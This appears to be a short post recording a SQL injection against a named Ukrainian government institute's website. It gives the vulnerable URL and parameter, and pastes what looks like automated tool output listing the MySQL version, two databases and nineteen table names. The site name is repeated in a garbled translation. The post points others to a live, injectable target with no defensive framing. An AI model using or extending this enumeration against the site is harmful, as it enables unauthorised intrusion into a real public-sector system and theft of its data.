.gov Government

.ua Ukraine

Institute of Mechanization and Electrification of Agriculture

Institute of Mechanics and Electrification of the Silskiy State Gift

https://www.imesg.gov.ua/info/index.php?id=334

the back-end DBMS: MySQL >= 5.0.12

available databases [2]:
[+] imesg_db_utf
[+] information_schema

Database: imesg_db_utf
[19 tables]
+----------------------+
| we_root^             |
| we_access_list       |
| we_access_type       |
| we_attach_file_types |
| we_div_type          |
| we_i                 |
| we_info_groups       |
| we_info_node_images  |
| we_info_sort_expr    |
| we_info_sort_type    |
| we_info_var_int      |
| we_info_var_string   |
| we_main_groups       |
| we_main_type         |
| we_main_var_float    |
| we_main_var_int      |
| we_main_var_string   |
| we_main_visit_log    |
| we_nav_type          |
+----------------------+
